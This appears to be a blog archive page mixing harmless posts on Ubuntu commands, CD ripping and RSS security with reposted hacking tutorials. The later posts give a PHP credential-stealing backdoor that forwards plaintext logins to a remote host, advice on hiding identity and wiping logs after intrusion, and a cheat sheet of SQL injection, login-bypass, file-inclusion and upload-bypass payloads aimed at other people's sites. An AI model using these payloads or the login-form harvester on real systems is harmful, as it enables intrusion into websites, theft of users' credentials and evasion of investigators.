Useful and Basic Commands and Shortcuts For Ubuntu Beginners

One of my friends asked me to list useful commands and shortcuts for him to use in his ubuntu distro. I listed some pretty useful ones and am also sharing them over here.

Basic Commands

Alt + F1: Opens application menu.
Alt + F2: Opens run command(something similar to run command in windows)
Ctrl +Alt + FN: Switch to TTYN terminals
Ctrl +Alt + F7: Switch to X Display
mkdir <dir_name>: Create a directory
cd $HOME: Set the current path as your home directory
cd /: Set the current path as root filesystem

Privileged commands: Note that most of these commands require you to have sudoers privilege which is specified in /etc/sudoers file.

sudo su: Run the shell as root user.
sudo su user: Run the shell as the user specified
sudo command: Run the specified command with root privilege
gksudo command: Run the specified command as graphical root mode.(used for graphical programs)
passwd: Change your password

Basic Network Commands

ifconfig: Displays information about network. Also, ifconfig interface would give information about the specified interface.
iwconfig: Displays information about wireless network
ping host_or_IP: Pings to check if the specified host or IP is online or not. Also useful for knowing if you are connected to some other network eg. internet.
host ip_addr: Displays hostname for specified IP address by querying nameservers specified in /etc/resolv.conf
ifup interface: Bring the specified network up.
ifdown interface: Bring the specified network down.
ssh user@hostname -p PORTNO: Establish SSh connection to specified host and port number and login as specified user.

Commands For Package Management: These commands require root privilege so either escalate privilege to root by sudo su command or precede each commands with sudo.

apt-get install package1 package2 .. packageN: Download and install the package(s) specified.
apt-get install -d package: Just download the packages(no installation)
apt-get update: Update packages information.
apt-get dist-upgrade: Perform distro version upgrade.
do-release-upgrade: Perform distro version upgrade.
apt-get remove package: Remove the specified package(s).
apt-get -f install: Fix packages problem.
dpkg --configure -a: Fix broken packages.

Other/Misc. Commands

id: Displays user and group IDs for current user.
uname -a: Displays all kernel information
gedit: Open text editor
nautilus: Open nautilus file manager
gksudo nautilus: Open root nautilus file manager
lsb_release -a: Get information about installed ubuntu version

These are some of the commands that has come in my mind as of now. I might update this list when some other commands come into my mind. By the way, TAB is very useful in terminal as it allows auto-completion and suggestion of commands and files in ubuntu. What this means is if you type do- and then press TAB, it will auto complete the command to do-release-upgrade thus saving some important time. Also be sure to share the useful commands in the comment section below.


Read more...

Rip Audio CDs With Windows Media Player

You need not download any other Audio CD ripping software in windows to rip your Audio CD as Audio CD ripping can be easily done with windows media player. I was thinking I might need to download ripping tools but I just guessed WMP might also have such feature and yeah it had easy way to do so. I'm here to help those non-techie people out there rip the audio CD.
First insert your Audio CD and play it with windows media player. There's a ripping option directly available in the interface. The screenshot provided below will help you to adjust your ripping settings. You might want to adjust the rip settings from the interface itself. Then select the tracks that you want to rip and click on the Rip CD button. Ripping will take few minutes and then output folder will open.

Read more...

RSS and Related Security Issues For Business People

While RSS is a very simple way to expand your business and nothing complex is involved in RSS feed systems, you should never underestimate the security issues in any digitized systems, not even in really simple technology like RSS. A business company should always be aware of possible security risks in any system they are employing to help them in their tasks.


Most of you might believe there would not be much security issues in RSS feeds and feel that you need not worry about any cases of exploiting of your system but that's just a myth. Malicious attackers can inject scripts inside the feeds and affect thousands of feed readers with even a single vulnerability discovered in the popular RSS reader or aggregators.

Bad HTML or javascript can be injected as malware inside the feeds and if your business is gathering content from other sources and adding them to feeds, your feeds are likely to be affected by such malwares. Such scripts are generally injected in the feed titles, descriptions, links and other components of the RSS feeds. The scripts injected can exploit the possible vulnerabilities in the RSS readers of your subscribers leading to possible control of your subscriber's PC by the attacker. This can open possible backdoors by the installation of trojans or keyloggers using the proper exploits such as browser exploits, activex exploits, etc. and let the attacker steal the data by using possible local zone security attacks which can be the worst thing you can imagine happening to your business as customers are the life blood of every business and you engage customers everywhere. And if your customers are affected, then ultimately your business will be affected. Hence extreme care should be taken while importing content from other sources to develop your RSS contents.

Many times business owners like to include the comments from subscribers in the RSS contents and mostly they hardly watch the actual content in those comments. There is always a possibility of injection of malicious scripts in those comments as well. So proper filtering and stripping mechanism has to be employed before storing new contents to your RSS feeds rather than just storing those comments in the feed contents. The HTML tags such as script, embed, object, etc. are the ones that must be stripped out in most cases to avoid possible security issues. Also, using safe and secure RSS reader or aggregator is a good approach to RSS security. So you should choose the most secure RSS reader or aggregator from the available ones and suggest those to your subscribers. Also, make sure that your customers and employees use the latest and patched version of the reader so that maximum level of security is ensured.

In many cases, the RSS generators and other services in the RSS servers are also prone to security attacks and the attackers might be able to gain certain level of privilege in the system. In such case, the attackers can replace the original RSS feeds with their own affected version of RSS feeds which will then be delivered to your customers affecting your customers and your business as well. This can be devastating as this might lead not only to the script injections in the feeds but also stealing of many sensitive information from the server. For example, if your RSS server is used to host your business website or maybe for file sharing, the critical data related to them might be compromised as well. So proper security assessment of the server and network from the security professionals is necessary before taking your system live for production usage.

As a business owner, you must understand that security is a necessity in any system, be it a physical system or be it a digitized and online system and RSS is not an exception to this. If you want to succeed as a business owner, you should never underestimate the need of security and privacy and you should employ proper level of security as discussed above in the RSS system. Security in RSS system will ensure gaining of customers and expansion and promotion of your business so do not miss security practices in your RSS feed contents.



Read more...

Practise, Learn and Master Web Application Hacking With DVWA

DVWA, which stands for Damn Vulnerable Web Application, is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.


The DVWA v. 1.07 can be downloaded from HERE.

You will need to install Apache+PHP+MySQL environment(use LAMPP or XAMPP packages) to run and test this web application. This will definitely help you learn to spot web vulnerabilities of the varied levels. I hope this was useful. :)

Read more...

How to steal password from login form

This article is written by neutralised of thesoftwareengineer.org but the domain has already expired so I thought to put this article here so that this small piece of information for beginner web hackers won't die.

-------------------------------------------------
[+] Login Form Password Stealing - Tutorial
[+] Author: Neutralise
[+] Location: http://thesoftwareengineer.org/services/tuts/LoginFormPassStealing.txt
--------------------------------------------------

Intro:
It seems that alot of people these days are gaining shell access, downloading a database then attempting to crack the hashes. If they are salted, sha1 or a hard to crack plain ole' MD5, they start bitchin and moaning when they can't get the plain text. So here it is, a tutorial on how to get user:pass format in plain text of ANY hash type.

Method:
Modify the login form of a site to catch the password remotely, before it is encrypted. I will explain this more simply via an example.
Take the following login form for example,

<form method="post" action="cookies.php">
<hr />
<p>
User: <input type="text" class="buttonstyle" name="username"></p>
<p>
Pass: <input type="password" class="buttonstyle" name="password"></p>
<p>
<input type="submit" value="Login" class="buttonstyle" name="submit"> 

<input type="reset" value="Reset" class="buttonstyle" /></p>
</form>

Now we can see that the action of this form points to 'cookies.php'. Now cookies.php will probably include a function similar to this depending on the encryption type, etc.

<?php
$user = $_POST['username'];
$pass = $_POST['password'];
if(md5($user) == $usermd5 && md5($pass) == $passmd5){
setcookie("Whatever", $cookie, time()+3600, "/");
header("Location: index.php");
die();
}
?>

Now on to bypassing the encryption before it happens, thus gaining the username and password in plain text we need to edit the 'cookie.php' site, add the following code at the start of the php tags.

<?php
$user = $_POST['username'];
$pass = $_POST['password'];
file_get_contents("http://site.com/plain.php?user=".$user."&pass=".$pass."");
?>>

Now the php file 'plain.php' will include the following code:

<?php
$user = $_GET['user'];
$pass = $_GET['pass'];
$file = "lol.txt";
$fp = fopen($file, "a");
fputs($fp, "$user:$pass\n");
fclose($fp);
?>>

Notice you will also need to upload a file 'lol.txt', and chmod it to 777.

Conclusion:
Now every time a user logs into the site you are editing the code of, it will send the username and password to the 'plain.php' text file and save it in 'log.txt', on a remoteserver in the format of:
user:pass

------------------------------
[+]^Neutralised.
------------------------------

Read more...

Art of hacking 2 - spyd3rm4n's guide to hacking

Earlier I posted the spyd3rm4n's guide to hacking part 1 over HERE. This is the 2nd part of the guide. Enjoy the guide.

Part II

[0x01] Common_Knowledge
[0x02] How


Sub Common_Knowledge{
It is customary that a hacker know how to hack, but it is mandatory that a hacker know how to hide his/her ass.

You DO NOT want to get caught because:
A) I'm sure you don't want to pay that hefty fine.
B) I'm positive you don't want a criminal record.
C) You probably don't want to be put on probation.
D) You put everybody you have contacted on the internet within your past at risk of being caught.
E) You WILL be frowned upon as a terrible hacker. Everyone knows, you're dumb as shit if you get caught.
F) If you find any reasons why getting caught would be a good idea, please consider the following:
Go to the local gunshop.
Purchase a powerful weapon (remember, you don't want to screw this up.)
Purchase a small magazine.
Go home, place the clip into the weapon, take off the saftey and look into the barrel of the gun and email me back
the color that flashes inside the barrel when the trigger is pulled.
}

Sub How{
What are some ways you can hide your ass? Well, good question, but there are many answers.

I have to say, that the most common way for a person to hide their e-dentity is via a proxy.
Now, one problem with the proxies, is that anyone with common sense can find out your real IP. This is the start of Forensics.
The easiest way for a person to find your IP is the find the provider of the proxy, most like CDN (CoDeeN), seeing that they are
the largest proxy releasing company on the inet. Once they contact CoDeeN (who keep records of all IP's logged into their proxy
at all times), they can find your IP and with a simple whois, can come up with the location of you or your ISP. After that, it's just
a long talk between you and your ISP to find out your information. That's if there has been illegal activity and/or you caused some 
pretty hefty damage. ISP's can't release a persons information without a court order as that is an invasion of privacy. But there are
some loop holes in this system. I'm sure you have all read your ISP's fine print and Terms of Service correct? Well, it will most likely
contain something stating that hacking is illegal and that if caught, they can and will report you to the authorities etc.
Another reason is because of the easy PHP function, $_SERVER['HTTP_X_FORWARDED_FOR'] which can be used to grab your real
IP and/or block your attempt at viewing the site.

Another way of hiding your ass, which I suggest as a first part, because it is the easiest, is find a VPN. VPN stands for Virtual Private
Network. Large companies/businesses have these VPN's for their employees to operate on a local network (LAN) over WAN (Wide
Area Network). They will mask your IP with the IP that the VPN is setup on. I.E. My IP is 66.77.88.102 and the VPN IP is 24.12.21.64,
when I log into the VPN, my IP will become 24.12.21.64. This covers your IP over every protocol, it whoops Socks 4 and Socks 5 proxies
rearends. The one thing you have to worry about with a VPN, is that they too, if setup correctly, can log every IP that has used the VPN
at anytime of the day.

Now that the 2 most common ways of hiding your ip have been discussed. Let's not rule out some of the other ways. One being VNC tunneling.
This is the process of logging in to a remote administrative tool repeatedly on other servers.
Example:
Server 1 IP: 1.2.3.4
Server 2 IP: 1.2.3.5
Server 3 IP: 1.2.3.6

All servers have VNC running. I will then log into the VNC for Server 1, then I will use Server 1's VNC to log into Server 2, and repeat the process until
I am logged in on Server 3. This will hide my IP 3 times and make tracing it back even harder. But, once again, you've guessed it. It records everything.

Well, Since I'm getting pretty desperate here, why don't I go balls out?

I will hop on a VPN, then I will VNC tunnel into about 2 or 3 Servers, while logging into a VPN on each of those, then, finally, when I'm tunneled into
Server 3, I will put a VPN on, log into a Socks 4 proxy, put on a anonymous proxy, if I have to, even goto a well known web proxifying site that runs
a CGI or PHP built proxy to view the content needed. Now, picture yourself as that person who has to find your real IP. Yeah, it's gonna be a blast.
The only bad part about this is the fact that the more you log into, the slower and slower it will get. Best done on a high-speed line.

Finally, since this is a mini-book on hiding your ass, I might as well tell you that everything of anything on the internet is logged. Don't forget to clear them.
Example: SSH-
don't forget to rm -rf /var/logs*
}

- Credits : Kr3w of TheDefaced.

Read more...

Art of hacking 1 - spyd3rm4n's guide to hacking

This series of articles can be very useful for many beginners out there but after the thedefaced and darkmindz went down, I haven't really seen these articles anywhere else. So I thought to share this article over here. Its NOT written by me and I would like to provide the full credit to the original author as well.


Art of hacking [ 1 ] 

spyd3rm4n's guide to hacking

Part I

[0x01] Definition
[0x02] Method
[0x03] Side_Notes
[0x04] Credits

Sub Definition{
a : to write computer programs for enjoyment
b : to gain access to a computer illegally
}

Sub Method{
These are the boundaries that differentiate a hacker, from a cracker. A cracker will use the same methods of a hacker, but instead of leaving it at just that, they will take it one step beyond, and use the information gained to extort another person and/or cause damage.

Now that has been cleared up, I will just inform you of one of my most common method of hacking.

When I hack, it is a golden rule that I must know what I am hacking. If it's a website, I must know what language is it written in. If I do not, I will learn the language, or at least be able to read it and pick out human errors in the programming.

I usually start like this:
I will first search the website for vulnerable user-input fields. Something that interacts with the viewer. It should include fields that are POST and GET. I will test these fields for penetration. The most common fields vulnerable, are search forms. These can be vulnerable to almost any type of injection, HTML, JAVASCRIPT, or SQL. To test if a field is injectable with HTML, I will usually type "<h1>hello</h1>." If the page returns the word hello in big bold letters, I know it's vulnerable. I then will step it up to JAVASCRIPT. I will type "<script>alert(1)</script>", <script language="Javascript">alert(1)</script>m etc.." If the returned page contains an alert message printing the number 1, I know I can cross-site script it (XSS). SQL on the other hand has a number of pen-testing syntaxes. I usually type a single quote, if it returns SQL errors, I know its vulnerable to injection. If it doesn't, I will sometimes try different combinations of SQL attacks. I will try most commonly, and my favorite, a union injection. Syntax: '+union+select+1-- 
If that returns with any sort of SQL error, I then know I hit the jackpot. The most common error with union selections is "The UNION SELECT statement is missing the correct number of columns" or something of that sort. It means that you have to select more than one column. This can be the longest part of injecting. You then have to '+union+select+1,2-- each time, adding on another number separated by a comma until your UNION SELECT statement has no errors, and returns a value from that field. I will then look for the returned page for a number. If for example, lets say I did '+union+select+1,2,3,4,5,6--
and the page returns a series of pictures, and in the blue, there is just the number 6 on that page, I will then do '+union+select+1,2,3,4,5,table_name+from+information_schema.tables--
This will select the table name from the information schema, if its allowed. That's all I'm going to say about that for now. If you want to know more, you can learn up on your SQL.

Next, if I find the site is pretty secure, it is always important not to rule out other methods of intrusion. My 2nd and favorite method, is the capturing of the host. With a simple WHOIS lookup, I can find the host of their site. Now, if I pen-test their host and find a vulnerability, that is just as good as hacking their site because it allows for a way in. If all else fails, you can do a reverse IP lookup on the domain of the website. Take a look at all the other websites on that IP and pen-test their security. If you can get rights to upload on one of their sites, you can upload a PHP-Shell and work your way into their directory, viewing their files. If you want to take it further, you can go ahead and try to root the server. Rooting is pretty easy if you know what you're looking for/know any stack/buffer overflows for the OS. Most servers run linux, so it's best to look for overflows for that specific kernel version that contain "Local Root" in it. Other than that, there are so many ways of obtaining root. These include but are not limited to key-logging, phishing, and social engineering. That's pretty much the basis of one of my most common methods of hacking. If you would like to know more, well.. I'm sorry, but you're going to have to pick up the knowledge as you continue your career hacking.
}

Sub Side_Notes{
If you want to learn more, you can check out the mini-books on Hide My Ass, XSS Injection, SQL Injection, Navigating towards root in a PHP Shell, and Stack Overflows in a nuttshell.
}

Sub Credits{
I'm sure you're all wondering who I am going to credit in this. The thing is that over the years, I have encountered many talented hackers. Too many to name in fact. But, there is one person I have to give credit to for being probably one of the most talented hackers I have "read" from. This person is unknown, and I'm sure many of you have read some of their docs. This person is the author of the ZFO (Zero For Owned) series. If you haven't read them, I highly suggest you do a google dork for Zeroforowned. Not to sure on how many of them are still public/around. (You'll notice the style of documentation similarity that I have put in this document, with the ZFO).
}

- Credits : Kr3w of TheDefaced 

Read more...

Web Hacking for Beginners and Intermediates

This is the article I posted on the secworm contest and I am now posting this in my blog. Its not that well written due to the lack of time but still will help some of you out there.

Hi all, I am Deadly Ghos7 aka sam207 and this is my article as the entry for the secworm contest #1. First, I would like to apologize for any kind of grammar mistakes in this article as there would be surely lots of grammatical errors in this article.

This article is not an article about teaching the basics of any web hacking techniques. Instead, it is the document of tips and tricks that the beginners and intermediates can make use of in order to attack the web applications on certain scenarios. I assume that you know the basics of the web hacking techniques or you could google for learning the basics. I'll be covering the tricks on different web hacking methods such as SQL injection(MySQL basically), insecure file inclusions, insecure file upload, etc. As already stated, the article won't be about basic but rather would present you few useful tricks that might be useful in the course of web-app pentesting.

SQL Injection:
Comments: - - , /* , #
MySQL version: SELECT @@version

Current SQL User: SELECT user()
SELECT system_user()

Current Database: SELECT database()

MySQL Data directory(location of MySQL data files): SELECT @@datadir

List all MySQL users: SELECT host, user, password FROM mysql.user

Bypass Quotes: SELECT pass FROM users WHERE user=0x2773616d32303727 --hex
SELECT pass FROM users WHERE user=char

Load local file: SELECT LOAD_FILE('/etc/passwd') --We can use quote bypassing here.

Create File with SQLi: SELECT * FROM table INTO dumpfile '/tmp/dump'
SELECT password FROM user INTO OUTFILE '/home/samar/www/dump.txt'
quote bypassing seems not working here. The path can't be encoded using the quote or char so we can't bypass the quote in this case.

Using limit: union all select null,table_name,null from information_schema.tables LIMIT 20,1
(useful when only one column is seen while doing SQLi)

unhex(hex()): union all select 1,concat(unhex(hex(username,0x3a,password))) from tblusers--

Bypassing filters:
uNiOn aLl SeLeCT 1,2 FrOm tbluser
/*!union*/ all select 1,2 from tbluser
union(select(null),table_name(from)(information_schema.tables)) --Bypassing the whitespace filter
0%a0union%a0select%091

XSS with SQLi (SIXSS): union all select 1,<script>alert(123)</script>

Login bypass:
'=' in both username and password field
' or 1='1'--
' or 1='1'/*
' or 1='1'#
' or 1='1';
In the username field and random password, it would bypass the vulnerable authentication login.

' /*or*/ 1='1 –Bypasses or filter


File Inclusion:
-> A sample vulnerable piece of code would be something like below: test.php


including file in the same directory
test.php?page=.htaccess
test.php?page=.htpasswd

path traversal to include files in other directories
test.php?page=../../../../../../../../../etc/passwd

Nullbyte injection
test.php?page=../../../../../etc/passwd

Directory listing with nullbyte injection only for FreeBSD (afaik) and magic quotes off
test.php?page=../../../../home/

PHP stream/wrappers inclusion
test.php?page=php://filter/convert.base64-encode/resource=config.php

Path Truncation inclusion
test.php?page=../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
With more details on this, http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
Apache Log injection
test.php?page=../logs/access.log
You'll have to find the location of the log in order to include it. Also you should try including everything you can such as the session files, uploaded files, etc. For the apache log injection, you'll have to telnet and send the GET request for arbitrary PHP code like Get / Few apache log locations to try are as below:

Useragent
test.php?page=../../../../../../../proc/self/environ
Set your useragent to some php code and it will get executed if you are able to include the /proc/self/environ file.

Check existence of folder:
test.php?page=../../../../../folder/you/guess/../../../../../etc/passwd
Here the trick is basically using the path traversal method.

File upload:
Nullbyte injection: If only valid extensions(such as jpg, gif) are allowed, we can rename our shell to shell.php.jpg which will bypass the file upload security check.

PHP code within image: Sometimes the uploads are not checked for the file extension but for dimensions of images. This again can be bypassed by injecting PHP codes in the valid images and renaming them to .php file. The tool named edjpgcom can be used in order to inject the PHP code as JPEG comments in the images.

Header bypass: Again sometimes the developer just relies on the header information that contains the type of the file like “image/jpeg” for jpeg image. But since this is passed from client side, it can be modified using the tools such as tamper data or live http headers.

Also, the file upload feature can be exploited in union with the file inclusion vulnerability. If you have a site vulnerable to the file inclusion but not vulnerable to the insecure file upload, you can upload valid image as said in second method here and then you can include that file with the file inclusion vulnerable PHP script.

As said earlier, this article is not about giving you every steps of how to exploit the web vulnerabilities.



Read more...